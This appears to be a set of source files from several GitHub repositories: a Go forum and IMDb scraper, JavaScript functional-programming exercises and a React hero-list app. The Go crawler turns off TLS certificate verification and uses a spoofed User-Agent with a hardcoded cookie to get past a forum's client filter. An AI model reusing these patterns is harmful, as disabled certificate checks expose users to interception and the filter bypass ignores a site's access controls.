                    <div className="filledPercentContainer">
                        <div className="filledPercent" style={{width: `${percent}%`, backgroundColor: fillColor}}></div>
                    </div>
                </div>
            </div>
            <div className="credits">Made by <span><NAME></span></div>
        </div>
    );
}
export default Home;<file_sep># **Twitter Sentiment Analysis**
Pulls the latest/top 100 tweets on the searched topic and reports the percentage of positive sentiment for that topic.<br>
## How to run?
### Server
```
cd server
python app.py
```
### Client
```
cd client\twitter-senti
npm start
```
## Screenshots



### Note: In the server directory, create a `.env` file and add your Twitter API Bearer Token as `bearerToken` (this is the environment variable name the server reads)
## 👩💻 Author
- **<NAME>** | 6fc7b766a20cc2df58b77ff6377720335815f954 | [
"JavaScript",
"Python",
"Markdown"
] | 3 | Python | RaviMauryaHootowl/Twitter-Sentiment-Analysis | e1286c71bbb20323570bc2d1d7e67ac73b72463f | 12724f855a60590d7a6a308022ba4585fedcdd55 |
refs/heads/master | <file_sep>package crw
import "time"
type (
	// VozConfig holds the settings for one crawl run.
	VozConfig struct {
		TheadUrl    string        // URL of the forum thread to crawl (sic: "Thead")
		NumWorker   int           // number of goroutines per pipeline stage
		TimeToWrite time.Duration // NOTE(review): not referenced in this file -- confirm callers use it
	}
)
<file_sep>package crw
import (
"crypto/tls"
"fmt"
"github.com/PuerkitoBio/goquery"
"net/http"
"os"
"strconv"
"strings"
"time"
)
//All function reuse form voz crawler https://github.com/lnquy/vozer
func getHTTPClient() *http.Client {
return &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{
InsecureSkipVerify: true,
},
},
Timeout: 10 * time.Second,
}
}
// getCustomRequest returns a GET request for url that impersonates a desktop
// Chrome browser. Since 2018/09/01 voz filters the default Go client
// user-agent, so a real-looking User-Agent (plus a session cookie) is
// attached to bypass the filter.
func getCustomRequest(url string) (*http.Request, error) {
	request, err := http.NewRequest("GET", url, nil)
	if err != nil {
		return nil, err
	}
	request.Header.Add("Cookie", "vflastvisit=1535954670; vflastactivity=0; vfforum_view=d99e85613f547374e9db4f942bf6192fb611ae2aa-1-%7Bi-17_i-1535954671_%7D; _ga=GA1.2.144936460.1535954673; _gid=GA1.2.1737523081.1535954673; _gat_gtag_UA_351630_1=1")
	request.Header.Add("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36")
	return request, nil
}
// getLastPageNu fetches the first page of the thread at url and extracts the
// total page count from the "Page 1 of N" pagination control. Returns 1 for
// single-page threads and (-1, error) on failure.
func getLastPageNu(url string) (int, error) {
	req, err := getCustomRequest(url)
	if err != nil {
		return -1, fmt.Errorf("failed to init request to first page: %s", err)
	}
	resp, err := getHTTPClient().Do(req)
	// BUG FIX: the old code read resp.Status while resp may be nil when
	// err != nil -- check the transport error before touching resp.
	if err != nil {
		return -1, fmt.Errorf("failed to crawl first page from thread: %s", err)
	}
	defer resp.Body.Close()
	if resp.StatusCode/200 != 1 {
		return -1, fmt.Errorf("failed to crawl first page from thread: %s", resp.Status)
	}
	firstPage, err := goquery.NewDocumentFromReader(resp.Body)
	if err != nil {
		return -1, err
	}
	// Pagination control reads e.g. "Page 1 of 100"; absence of the control
	// means the thread only has a single page.
	pageControlStr := firstPage.Find("div.neo_column.main table").First().Find("td.vbmenu_control").Text()
	if pageControlStr == "" {
		return 1, nil
	}
	lastPageStr := pageControlStr[strings.LastIndex(pageControlStr, " ")+1:]
	lastPageNu, err := strconv.Atoi(lastPageStr)
	if err != nil {
		return -1, err
	}
	return lastPageNu, nil
}
// MakeDirFormTitle fetches the thread's first page, reads the thread title
// from the navbar, creates a directory named after the (trimmed) title and
// returns that name.
func MakeDirFormTitle(url string) (string, error) {
	req, err := getCustomRequest(url)
	if err != nil {
		return "", fmt.Errorf("failed to init request to first page: %s", err)
	}
	resp, err := getHTTPClient().Do(req)
	// BUG FIX: the old code deferred resp.Body.Close() and read resp.Status
	// before checking err; resp is nil when err != nil, which panicked.
	if err != nil {
		return "", fmt.Errorf("failed to crawl first page from thread: %s", err)
	}
	defer resp.Body.Close()
	if resp.StatusCode/200 != 1 {
		return "", fmt.Errorf("failed to crawl first page from thread: %s", resp.Status)
	}
	page, err := goquery.NewDocumentFromReader(resp.Body)
	if err != nil {
		return "", err
	}
	title := strings.TrimSpace(page.Find("td.navbar").First().Find("strong").Text())
	// A MkdirAll failure was previously printed and checked twice; just
	// propagate it once.
	if err := os.MkdirAll(title, os.ModePerm); err != nil {
		return "", err
	}
	return title, nil
}
<file_sep>package imdb
import "github.com/globalsign/mgo"
// ConnectDB opens an mgo session against the MongoDB instance at url.
func ConnectDB(url string) (*mgo.Session, error) {
	return mgo.Dial(url)
}
<file_sep>package crw
import (
"context"
"encoding/json"
"fmt"
"github.com/PuerkitoBio/goquery"
"github.com/sirupsen/logrus"
"io/ioutil"
"net/http"
"path/filepath"
"strconv"
"strings"
"sync"
)
type (
	// PagesChanel carries one crawled thread page through the fan-in
	// pipeline together with its page number.
	PagesChanel struct {
		PageNumber int
		PageData   *goquery.Selection
	}

	// PostsChanel carries a single post extracted from a page.
	PostsChanel struct {
		PostCount int
		PostDate  string
		PostData  *goquery.Selection
	}

	// UrlMetadata pairs a page URL with its page number.
	UrlMetadata struct {
		Url     string
		pageNum int
	}

	// Comment is the JSON document persisted for every post.
	Comment struct {
		User      User   `json:"user"`
		PostCount int    `json:"post_count"`
		PostDate  string `json:"post_date"`
		Cmd       string `json:"cmd"`
	}

	// User describes the forum member who wrote a comment.
	User struct {
		// BUG FIX: the tag previously ended in a stray backslash
		// (`json:"user_name"\`), leaving a malformed struct tag.
		UserName    string `json:"user_name"`
		UserPage    string `json:"user_page"`
		Description string `json:"description"`
		JoinDate    string `json:"join_date"`
	}

	// CommenttoWrite accumulates comments before a bulk write.
	// NOTE(review): the field is unexported, so encoding/json ignores it
	// despite the tag.
	CommenttoWrite struct {
		cmd []Comment `json:"cmd"`
	}
)
var (
	// NOTE(review): mu and cmtw are never referenced anywhere in this file --
	// presumably leftovers from an earlier synchronized-write design.
	mu   = sync.Mutex{}
	cmtw = CommenttoWrite{}
)
// Crawler drives the whole pipeline: it determines the thread's page count,
// spawns worker stages (page -> post -> extraction -> save) connected by
// channels, then feeds every page URL into the first stage.
//
// FIXME(review): the sync.WaitGroups below are passed to the workers BY VALUE
// (the workers take sync.WaitGroup, not *sync.WaitGroup), so Done() runs on a
// copy and the Wait() calls in these closures can never return -- the
// downstream close() calls are unreachable.
// FIXME(review): postChanel is closed in two different goroutines (after the
// PostCrawler workers AND after the DataExtraction workers); a double close
// panics. The extraction closer presumably should close cmdchanel/urlchanel.
func Crawler(ctx context.Context, cf VozConfig) {
	lastNuPage, err := getLastPageNu(cf.TheadUrl)
	if err != nil {
		// NOTE(review): execution continues with lastNuPage == -1 here.
		logrus.Errorf("can't get page number all crawler is finish %v", err)
	}
	pageschanel := make(chan PagesChanel, lastNuPage)
	UrlChanel := make(chan UrlMetadata, lastNuPage)
	// Stage 1: fetch pages for the URLs queued below.
	go func(ctx context.Context) {
		var pgwg sync.WaitGroup
		for i := 1; i <= cf.NumWorker; i++ {
			pgwg.Add(1)
			go PageCrawler(i, ctx, pgwg, pageschanel, UrlChanel)
		}
		pgwg.Wait()
		logrus.Infof("all page crawler is done extracting data")
		close(pageschanel)
	}(ctx)
	postChanel := make(chan PostsChanel, 10*lastNuPage)
	// restriction worker to avoid goroutine grown without control
	// Stage 2: split each page into individual posts (fixed 10 workers).
	go func(ctx context.Context) {
		var postwg sync.WaitGroup
		for j := 1; j <= 10; j++ {
			postwg.Add(1)
			go PostCrawler(ctx, j, postwg, pageschanel, postChanel)
		}
		postwg.Wait()
		close(postChanel)
	}(ctx)
	cmdchanel := make(chan Comment)
	urlchanel := make(chan string)
	// Stage 3: extract comment structs and image URLs from each post.
	go func(ctx context.Context) {
		var postwg sync.WaitGroup
		for j := 1; j <= cf.NumWorker; j++ {
			postwg.Add(1)
			go DataExtraction(ctx, postwg, j, postChanel, cmdchanel, urlchanel)
		}
		postwg.Wait()
		// FIXME(review): second close of postChanel (see function comment).
		close(postChanel)
	}(ctx)
	// Stage 4: persist comments and images to disk.
	go func(ctx context.Context) {
		var cmdwg sync.WaitGroup
		for j := 1; j <= cf.NumWorker; j++ {
			cmdwg.Add(1)
			go Save(j, cmdwg, urlchanel, cmdchanel, cf)
		}
		cmdwg.Wait()
	}(ctx)
	// Feed every page URL of the thread into the pipeline, then signal EOF.
	for pageidx := 1; pageidx <= lastNuPage; pageidx++ {
		logrus.Infof("throwing %s&page=%d into chanel to process ", cf.TheadUrl, pageidx)
		UrlChanel <- UrlMetadata{
			Url:     fmt.Sprintf("%s&page=%d", cf.TheadUrl, pageidx),
			pageNum: pageidx,
		}
	}
	close(UrlChanel)
}
// PostCrawler consumes crawled pages and emits one PostsChanel item per post
// found on the page (post counter, post date and the raw selection).
// FIXME(review): pg is a sync.WaitGroup passed by value -- Done() decrements
// a copy, so the caller's Wait() never observes completion.
func PostCrawler(ctx context.Context, idx int, pg sync.WaitGroup, pagesin <-chan PagesChanel, postOut chan<- PostsChanel) {
	defer pg.Done()
	logrus.Infof("post crawler #%d : crawling post data ", idx)
	for {
		select {
		case <-ctx.Done():
			logrus.Info("all crawler is terminated by user ")
			return
		case p, ok := <-pagesin:
			if !ok {
				logrus.Infof("post crawler done")
				return
			}
			logrus.Infof("post crawler #%d : getting post from page %d", idx, p.PageNumber)
			page := p.PageData
			page.Each(func(i int, post *goquery.Selection) {
				// The anchor name attribute carries the running post counter.
				postcountstr, _ := post.Find("a").First().Attr("name")
				postcountint, _ := strconv.Atoi(postcountstr)
				date := strings.TrimSpace(post.First().Find("td div.normal").Last().Text())
				data := post
				out := PostsChanel{
					PostCount: postcountint,
					PostDate:  date,
					PostData:  data,
				}
				postOut <- out
			})
			logrus.Infof("post crawler #%d : getting post from page %d done", idx, p.PageNumber)
		}
	}
}
// PageCrawler consumes page URLs and emits the downloaded page documents.
// FIXME(review): wg is a sync.WaitGroup passed by value -- Done() decrements
// a copy, so the caller's Wait() never observes completion.
func PageCrawler(idx int, ctx context.Context, wg sync.WaitGroup, pageout chan<- PagesChanel, urlin <-chan UrlMetadata) {
	defer wg.Done()
	for {
		select {
		case <-ctx.Done():
			logrus.Info("all crawler is terminated by user ")
			return
		case url, ok := <-urlin:
			if !ok {
				logrus.Info("page crawler all done")
				return
			}
			logrus.Infof("page crawler #%d extracting page:%d", idx, url.pageNum)
			pageout <- DataCrawler(url.Url, url.pageNum)
			logrus.Infof("page :%s done", url.Url)
		}
	}
}
// DataCrawler downloads a single thread page and returns the selection of
// its post tables wrapped in a PagesChanel.
// FIXME(review): every error below is only printed and execution continues;
// when the HTTP request fails, `respond` is nil and respond.Body panics.
func DataCrawler(url string, numpage int) PagesChanel {
	rq, err := getCustomRequest(url)
	if err != nil {
		fmt.Print(err)
	}
	respond, err := getHTTPClient().Do(rq)
	if err != nil {
		fmt.Print(err)
	}
	Doc, err := goquery.NewDocumentFromReader(respond.Body)
	if err != nil {
		fmt.Print(err)
	}
	// Each "table.tborder.voz-postbit" node is one post on the page.
	pageDoc := Doc.Find("table.tborder.voz-postbit")
	page := PagesChanel{PageNumber: numpage, PageData: pageDoc}
	return page
}
//func CheckResult(cmd chan Comment) {
// for {
// select {
// case c, ok := <-cmd:
// if !ok {
// logrus.Infof("done")
// }
// logrus.Info(c.PostCount)
// logrus.Infof("-------")
// }
// }
//}
// DataExtraction turns each raw post selection into a Comment (user info,
// counter, date, text) and additionally emits every absolute image URL
// embedded in the post body.
// FIXME(review): wg is a sync.WaitGroup passed by value -- Done() decrements
// a copy, so the caller's Wait() never observes completion.
func DataExtraction(ctx context.Context, wg sync.WaitGroup, idx int, posts <-chan PostsChanel, cmtout chan<- Comment, imageURl chan<- string) {
	defer wg.Done()
	for {
		select {
		case <-ctx.Done():
			logrus.Infof("data extraction is terminated")
			return
		case post, ok := <-posts:
			if !ok {
				logrus.Infof("all crawler is done")
				return
			}
			postdata := post.PostData
			// User block: name + profile link live in the first td.alt2 cell.
			usrif := postdata.First().Find("td.alt2").First().Find("a.bigusername")
			userUrl, ok := usrif.Attr("href")
			userName := usrif.Text()
			role := postdata.First().Find("td.alt2").First().Find("div.smallfont").First().Text()
			joindDate := postdata.Find("td.alt2 table tbody tr td").Last().Find("div.smallfont").Find("div").First().Text()
			user := User{
				UserName:    userName,
				UserPage:    fmt.Sprintf("https://forums.voz.vn/%s", userUrl),
				Description: role,
				JoinDate:    strings.Trim(joindDate, ("Join Date: ")),
			}
			cmdstr := postdata.Find("div.voz-post-message").Text()
			comnent := Comment{
				User:      user,
				PostCount: post.PostCount,
				PostDate:  post.PostDate,
				Cmd:       cmdstr,
			}
			cmtout <- comnent
			// Forward every absolute image URL found in the post body.
			postdata.Find("div.voz-post-message").Find("img").Each(func(i int, imglink *goquery.Selection) {
				url, ok := imglink.Attr("src")
				if ok {
					if strings.HasPrefix(url, "http") {
						imageURl <- url
					}
				}
			})
		}
	}
}
// Save persists crawled artifacts into the thread's directory: image URLs
// from imgchanel are downloaded to disk, comments from cmdchan are written
// as "<postcount>-cmd.json". idx identifies the worker for logging only.
//
// Fixes over the previous version: a closed channel used to busy-loop
// forever on zero values (now the case is disabled by nil-ing the channel
// and the worker returns once both inputs are closed); the response body is
// closed on non-2xx statuses; the ReadAll error is no longer ignored.
//
// NOTE(review): wg is still received by value, so Done() acts on a copy and
// never releases the caller's WaitGroup; the signature should take
// *sync.WaitGroup but is left unchanged to keep call sites compiling.
func Save(idx int, wg sync.WaitGroup, imgchanel chan string, cmdchan chan Comment, cf VozConfig) {
	defer wg.Done()
	dir, _ := MakeDirFormTitle(cf.TheadUrl)
	logrus.Infof("save %d running ", idx)
	client := http.Client{}
	for {
		select {
		case url, ok := <-imgchanel:
			if !ok {
				logrus.Infof("save done")
				// Receiving from a nil channel blocks forever, which removes
				// this case from the select instead of spinning on zeros.
				imgchanel = nil
				if cmdchan == nil {
					return
				}
				continue
			}
			logrus.Infof("image form url : %s", url)
			resp, err := client.Get(url)
			if err != nil {
				continue
			}
			if resp.StatusCode/200 != 1 {
				resp.Body.Close() // don't leak the connection on bad status
				continue
			}
			b, err := ioutil.ReadAll(resp.Body)
			resp.Body.Close()
			if err != nil {
				continue
			}
			// File name = last path segment of the image URL.
			fp := filepath.Join(dir, url[strings.LastIndex(url, "/")+1:])
			if err := ioutil.WriteFile(fp, b, 0644); err != nil {
				continue
			}
		case cmd, ok := <-cmdchan:
			if !ok {
				logrus.Infof("save done")
				cmdchan = nil
				if imgchanel == nil {
					return
				}
				continue
			}
			j, _ := json.MarshalIndent(cmd, "", " ")
			fp1 := filepath.Join(dir, fmt.Sprintf("%d-cmd.json", cmd.PostCount))
			if err := ioutil.WriteFile(fp1, j, 0644); err != nil {
				continue
			}
		}
	}
}
<file_sep>package imdb
import (
"encoding/json"
"fmt"
"testing"
"time"
)
// TestNormalizeURL prints the normalized form of a representative IMDb
// title URL so the cleanup can be eyeballed (no assertion yet).
func TestNormalizeURL(t *testing.T) {
	raw := "/title/tt0111161/?pf_rd_m=A2FGELUUNOQJNL&pf_rd_p=e31d89dd-322d-4646-8962-327b42fe94b1&pf_rd_r=D70AGXBVMEB6Q7B64YY1&pf_rd_s=center-1&pf_rd_t=15506&pf_rd_i=top&ref_=chttp_tt_1"
	fmt.Println(NormalizeURL(raw))
}
// TestCrawler runs the whole crawl once and prints how long it took.
func TestCrawler(t *testing.T) {
	began := time.Now()
	Crawler()
	fmt.Println(time.Since(began))
}
// TestExtractDetailNonChan fetches the detail of a single hard-coded film
// and dumps the result as indented JSON for manual inspection.
func TestExtractDetailNonChan(t *testing.T) {
	target := "https://www.imdb.com/title/tt0111161/?pf_rd_m=A2FGELUUNOQJNL&pf_rd_p=e31d89dd-322d-4646-8962-327b42fe94b1&pf_rd_r=9BSACD527YX11PKNTZXR&pf_rd_s=center-1&pf_rd_t=15506&pf_rd_i=top&ref_=chttp_tt_1"
	films := []Film{{Title: "fdsds", URL: target}}
	details := ExtractDetailNonChan(films)
	jstring, err := json.MarshalIndent(details, "", " ")
	if err != nil {
		fmt.Println(err)
	}
	fmt.Printf("%s\n", jstring)
}
// TestGetDocFormURL fetches the Top-250 chart page and prints the parsed
// document (and any fetch error) for manual inspection.
func TestGetDocFormURL(t *testing.T) {
	document, fetchErr := GetDocFormURL("https://www.imdb.com/chart/top?ref_=nv_mv_250")
	if fetchErr != nil {
		fmt.Println(fetchErr)
	}
	fmt.Println(document)
}
// TestMakeURLTopRate drains the channel fed by MakeURLTopRate and prints
// each film. Ranging over the channel terminates once the producer closes
// it; the previous for/select form kept receiving the zero value forever
// after close, so the test never finished.
func TestMakeURLTopRate(t *testing.T) {
	in := make(chan Film)
	go MakeURLTopRate(in)
	for f := range in {
		fmt.Println(f)
	}
}
<file_sep>package imdb
// IMDBConf groups the crawler's tunables.
type (
	IMDBConf struct {
		// NumWorker is the number of concurrent extraction workers to run.
		NumWorker int
	}
)
<file_sep>package main
import "github.com/PhamDuyKhang/cwr/imdb"
// main runs the IMDb top-rated crawler.
//
// The previous voz.vn forum-crawler bootstrap (VozConfig, context
// cancellation and SIGINT/SIGTERM handling) was dead, commented-out code
// and has been removed; see package crw if it needs to be revived.
func main() {
	imdb.Crawler()
}
<file_sep>package crw
import (
"fmt"
"github.com/PuerkitoBio/goquery"
"strings"
)
// CrawlerPageStage1 is a one-page smoke test: it downloads a thread page
// and dumps each post's metadata (post count, date, author, role, join
// date), the post text and every embedded image URL to stdout.
//
// Fixes over the previous version: early return on request/fetch/parse
// errors (the old code continued with a nil response and panicked), the
// response body is closed, and the stray trailing space in the "img "
// selector was removed.
func CrawlerPageStage1(url string) {
	rq, err := getCustomRequest(url)
	if err != nil {
		fmt.Print(err)
		return
	}
	respond, err := getHTTPClient().Do(rq)
	if err != nil {
		fmt.Print(err)
		return
	}
	defer respond.Body.Close()
	Doc, err := goquery.NewDocumentFromReader(respond.Body)
	if err != nil {
		fmt.Print(err)
		return
	}
	// Each post lives in its own table.tborder.voz-postbit element.
	page := Doc.Find("table.tborder.voz-postbit")
	page.Each(func(i int, s *goquery.Selection) {
		// Post counter, e.g. "1", carried in the name attr of the first anchor.
		postcount, ok := s.Find("a").First().Attr("name")
		// Post date, e.g. "Yesterday, 11:37".
		date := s.First().Find("td div.normal").Last().Text()
		if ok {
			fmt.Println(postcount)
		}
		fmt.Println(strings.TrimSpace(date))
		// Author block: profile link (e.g. member.php?u=1125) + display name.
		usrif := s.First().Find("td.alt2").First().Find("a.bigusername")
		userurl, ok := usrif.Attr("href")
		if ok {
			fmt.Println(userurl)
		}
		username := usrif.Text()
		fmt.Println(username)
		// Forum role, e.g. "Junior Member".
		role := s.First().Find("td.alt2").First().Find("div.smallfont").First().Text()
		fmt.Println(role)
		cmds := s.Find("div.voz-post-message")
		jo := s.Find("td.alt2 table tbody tr td").Last().Find("div.smallfont").Find("div").First().Text()
		fmt.Println(strings.Trim(jo, ("Join Date: ")))
		fmt.Println(strings.TrimSpace(cmds.Text()))
		// Dump every embedded image source URL.
		cmds.Find("img").Each(func(i int, alink *goquery.Selection) {
			url, ok := alink.Attr("src")
			if ok {
				fmt.Println(url)
			}
		})
		fmt.Println("---------------")
	})
}
| 9dc7c099aad0568925a71ab8469049d65566e9a1 | [
"Go"
] | 8 | Go | PhamDuykhang/cwr | b91c6fdf8498492f01dc49a8594354dbbc3f9095 | a4691c9feae99d0e0ba55b3949bb12edd1b0c089 |
refs/heads/master | <file_sep>/**
* What we see is that for mutable values, updating state applies across all references to that variable.
* So changing a value in one place, changes it for all references to that object.
* For the immutable data types, we have no way of changing the internal state of the data, so the reference always gets reassigned to a new object.
*/
let obj = {
  prop: 'Hello world'
};
let obj2 = obj; // second reference to the SAME object
obj.prop = 'I wanna change!';
console.log(obj2.prop); // 'I wanna change!' — the mutation is visible via obj2
// Fixed: this used to compare obj with itself (always true); the demo
// clearly means to compare the two references.
console.log(obj === obj2);

let array = ['1', '2'];
let array2 = array; // second reference to the SAME array
array.push(5);
console.log(array2); // ['1', '2', 5]
console.log(array === array2); // true — still the same array

let number = 16;
let number2 = number; // primitives are copied on assignment
number = 88;
console.log(number2); // still 16
console.log(number === number2); // false

const PI = 3.14; // const blocks rebinding; it does not deep-freeze values
<file_sep>export const ACTION_TYPES = {
TOGGLE_FORM: 'TOOGLE_FORM',
SET_NAME: 'SET_NAME',
SET_POWER: 'SET_POWER',
ADD_HERO: 'ADD_HERO',
REMOVE_HERO: 'REMOVE_HERO',
EDIT_HERO: 'EDIT_HERO',
LOAD_DATA: 'LOAD_DATA'
}
/** Show or hide the add/edit hero form. */
export function toggleForm(showForm) {
  return { type: ACTION_TYPES.TOGGLE_FORM, showForm };
}

/** Set the "name" form field. */
export function setName(name) {
  return { type: ACTION_TYPES.SET_NAME, name };
}

/** Set the "power" form field. */
export function setPower(power) {
  return { type: ACTION_TYPES.SET_POWER, power };
}

/** Commit the form: add a new hero, or save the one being edited. */
export function addHero() {
  return { type: ACTION_TYPES.ADD_HERO };
}

/** Delete the hero with the given id. */
export function removeHero(id) {
  return { type: ACTION_TYPES.REMOVE_HERO, id };
}

/** Begin editing the hero with the given id. */
export function editHero(editId) {
  return { type: ACTION_TYPES.EDIT_HERO, editId };
}
<file_sep>import { h } from 'virtual-dom';
import hh from 'hyperscript-helpers';
import { formView } from './form-view';
import { tableView } from './table-view';
const { div, h1 } = hh(h);
// Top-level view: a card holding the heading, the hero form and the table.
export function view(state, dispatch) {
  const content = [
    h1({}, 'Hero Generator'),
    formView(state, dispatch),
    tableView(state, dispatch),
  ];
  return div({ className: 'card mt-5' }, [div({ className: 'card-body' }, content)]);
}
<file_sep>## In order to set up the project
1. Clone the project
2. cd into project-setup
3. npm install
4. npm run start
<file_sep>import { h } from 'virtual-dom';
import hh from 'hyperscript-helpers';
import {removeHero, editHero } from '../actions/actions';
const { h3, table, thead, tbody, tr, th, td, i } = hh(h);
// Renders the hero table, or a placeholder heading when the list is empty.
export function tableView(state, dispatch) {
  if (!state.heroes.length) {
    return h3({ className: 'mt-3' }, 'No heroes to show');
  }
  return table({ className: 'table table-striped mt-5' }, [
    tableHeader(),
    tableBody(state, dispatch),
  ]);
}
// Static header row: Name | Power | Actions.
function tableHeader() {
  const headings = [cell(th, '', 'Name'), cell(th, '', 'Power'), cell(th, '', 'Actions')];
  return thead({}, [tr({}, headings)]);
}
// Tiny helper: build a table cell with the given tag (th/td), class and content.
function cell(tag, className, value) {
  return tag({ className }, value);
}
// Body: one row per hero, plus a trailing totals row.
function tableBody(state, dispatch) {
  const heroRows = state.heroes.map((hero) => row(hero, dispatch));
  return tbody({}, [[...heroRows, totalRow(state.heroes)]]);
}
// One hero row with inline edit / delete icon actions.
function row({ id, name, power }, dispatch) {
  const actions = [
    i({ className: 'fas fa-edit pointer', onclick: () => dispatch(editHero(id)) }),
    i({ className: 'fas fa-trash-alt pointer', onclick: () => dispatch(removeHero(id)) }),
  ];
  return tr({}, [cell(td, '', name), cell(td, '', power), cell(td, '', actions)]);
}
// Footer row summing every hero's power.
function totalRow(heroes) {
  const totalPower = heroes.reduce((sum, hero) => sum + hero.power, 0);
  return tr({}, [cell(td, '', 'Total: '), cell(td, '', totalPower), cell(td, '', '')]);
}
<file_sep>import './styles.scss';
import { app } from './app/app';
import { view } from './app/view/view';
import { initialState } from './app/state/state';
// Mount point declared in index.html; the whole app renders inside it.
const rootNode = document.querySelector('#app');
// Wire the view/update loop to the DOM with the initial application state.
app(view, rootNode, initialState);
<file_sep>import { ACTION_TYPES } from '../actions/actions';
export function update(action, state) {
switch(action.type) {
case ACTION_TYPES.TOGGLE_FORM: {
const { showForm } = action;
return { ...state, showForm: showForm };
}
case ACTION_TYPES.SET_NAME: {
const { name } = action;
return { ...state, name };
}
case ACTION_TYPES.SET_POWER: {
let { power } = action;
const powerFormatter = compose(defaultTo, parseInt);
power = powerFormatter(0, power);
return { ...state, power };
}
case ACTION_TYPES.ADD_HERO: {
const updatedState = state.editId === null ? add(state) : edit(state);
return updatedState;
}
case ACTION_TYPES.REMOVE_HERO: {
const { id } = action;
const heroes = state.heroes.filter(hero => hero.id !== id);
return { ...state, heroes };
}
case ACTION_TYPES.EDIT_HERO: {
const { editId } = action;
const heroToEdit = state.heroes.find(hero => hero.id === editId);
const { name, power } = heroToEdit;
return { ...state, editId, name, power, showForm: true }
}
default: {
return { ...state };
}
}
}
// Append the hero being built to the list, bump the id counter and reset
// the form fields.
function add(state) {
  const { id, name, power } = state;
  const heroes = [...state.heroes, { id, name, power }];
  return { ...state, id: id + 1, name: '', power: 0, heroes, showForm: false };
}
// Write the form fields back onto the hero currently being edited, then
// clear the edit marker and close the form.
function edit(state) {
  const { editId, name, power } = state;
  const heroes = state.heroes.map((hero) =>
    hero.id === editId ? { ...hero, name, power } : hero
  );
  return { ...state, heroes, name: '', power: 0, editId: null, showForm: false };
}
// Fall back to defaultValue when value is null, undefined or NaN.
// Deliberately uses the coercing global isNaN, so non-numeric strings such
// as 'abc' are also replaced by the default (matching the original).
function defaultTo(defaultValue, value) {
  return value == null || isNaN(value) ? defaultValue : value;
}
// Left-to-right composition of exactly two functions: fn1 runs first and
// its result is fed to fn2 (i.e. this is really "pipe" despite the name).
function compose(fn1, fn2) {
  return (...args) => fn2(fn1(...args));
}
<file_sep>const dragonsString = '<NAME>';
// Build-and-call the pipeline in one go…
const length = pipe(split, getLength, multiplyBy2)(dragonsString);
// …or name the pipeline first and reuse it.
const getLengthAndMultiplyBy2 = pipe(split, getLength, multiplyBy2);
const length2 = getLengthAndMultiplyBy2(dragonsString);
// (The bare `length2` / `length` expression statements that followed were
// REPL leftovers with no effect in a script; removed.)
/**
 * pipe(f, g, h) returns x => h(g(f(x))): left-to-right function composition.
 */
function pipe(...fns) {
  return (arg) => fns.reduce((acc, fn) => fn(acc), arg);
}

/** Number of elements in an array (or characters in a string). */
function getLength(array) {
  return array.length;
}

/** Split a comma-plus-space separated string into its parts. */
function split(string) {
  return string.split(', ');
}

/** Double a number. */
function multiplyBy2(val) {
  return val * 2;
}
<file_sep>### In order to start the counter-reworked and heroes-reworked:
1. cd into each directory,
2. npm install
3. npm start
### The rest of the files can be run with Node.js (e.g. `node currying/index.js`)
Enjoy<file_sep>// expected output: [1, 2, { p: 4 }, 1, 2, 3, 3, 4, 5, 10, 1, 2, 'poop']
const collection = [1, 2, { p: 4 }, [1, 2, 3], [[3, [4, 5]]], [[[[[10]]]]], [[1],[2]], 'poop'];
// Deep-flattens an arbitrarily nested array; non-array items pass through.
function run(array) {
  return array.reduce(destructure, []);
}
// Reducer step: arrays are recursively flattened into the accumulator,
// anything else is appended as-is.
function destructure(acc, curr) {
  return Array.isArray(curr)
    ? [...acc, ...curr.reduce(destructure, [])]
    : [...acc, curr];
}
console.log(run(collection));
<file_sep>import { diff, patch } from 'virtual-dom';
import createElement from 'virtual-dom/create-element';
import { update } from './update/update';
// Minimal Elm-style runtime: render the initial view, then on every
// dispatched action compute the next state, re-render, diff the two
// virtual trees and patch only what changed in the real DOM.
export function app(view, rootNode, initialState) {
  let state = initialState;
  let currentView = view(initialState, dispatch);
  let node = createElement(currentView); // materialize the initial virtual tree
  rootNode.appendChild(node);

  // Passed into every render so event handlers can feed actions back in.
  function dispatch(action) {
    state = update(action, state);
    const updatedView = view(state, dispatch);
    const patches = diff(currentView, updatedView); // delta between renders
    // patch mutates `node` in place; reusing `node` on later patches works
    // because it remains the live DOM root.
    rootNode = patch(node, patches);
    currentView = updatedView;
  }
}
<file_sep>export const initialState = {
  id: 0,           // next id to assign to a newly added hero
  name: '',        // form field: hero name being typed
  power: 0,        // form field: hero power being typed
  showForm: false, // whether the add/edit form is visible
  editId: null,    // id of the hero being edited, or null when adding
  heroes: []       // list of { id, name, power } records
}
| dce097b57e3680e66379572a8e938ecdb245c9a7 | [
"JavaScript",
"Markdown"
] | 12 | JavaScript | groszwilhelm/functional-programming | 44339d8307b10cd91cca3ab129d5c4957c41b0bc | f7f2ead4831dbe84804a196b6b04891704d58c41 |
refs/heads/master | <repo_name>abdiawali/final<file_sep>/model/record.js
module.exports = (sequelize, DataTypes) => {
var Record = sequelize.define('Record', {
subject: {
type: DataTypes.STRING,
}, when: {
type: DataTypes.STRING,
}, howLong: {
type: DataTypes.NUMBER,
}, style: {
type: DataTypes.STRING,
}
})
Record.sync({force: true}).then( () => {
console.log('synced table')
})
return Record
}<file_sep>/models/records.js
//map database table for the records
'use strict';
module.exports = (sequelize, DataTypes) => {
const Record = sequelize.define('Record', {
subject: DataTypes.STRING,
when: DataTypes.STRING,
howLong: DataTypes.FLOAT,
style: DataTypes.STRING
})
Record.sync({force: true}).then( () => {
console.log('synced table')
})
Record.associate = function(models) {
// associations can be defined here
};
return Record;
}; | 7d4bdd5dc83b8a46656228caa13184004f98bc36 | [
"JavaScript"
] | 2 | JavaScript | abdiawali/final | 2109fffa97bd468f342ac17b6d29f4e051a7831f | 04c5b8ef2c48194febbf12829984d8a6222c4a0b |
refs/heads/master | <repo_name>Aboutique1/Project3<file_sep>/p-3/src/contactUs.js
import React from 'react';
// import './App.css';
import ContactUsForm from './ContactUsForm';
// Contact page: heading, short blurb and the email contact form.
function ContactUs() {
  return (
    <div className="App">
      <h2>Contact Us</h2>
      <p>Shoot us an email...</p>
      <ContactUsForm />
    </div>
  );
}
export default ContactUs;
<file_sep>/p-3/src/App.js
import React from 'react';
import {
BrowserRouter as Router,
Switch,
Route,
Link
} from "react-router-dom";
import { Navbar, Nav } from "react-bootstrap";
// import logo from './logo.svg';
import ContactUs from './contactUs';
import About from './about';
import './App.css';
function App() {
return (
<Router>
<Navbar bg="dark" expand="lg" fixed="top">
<Navbar.Brand>
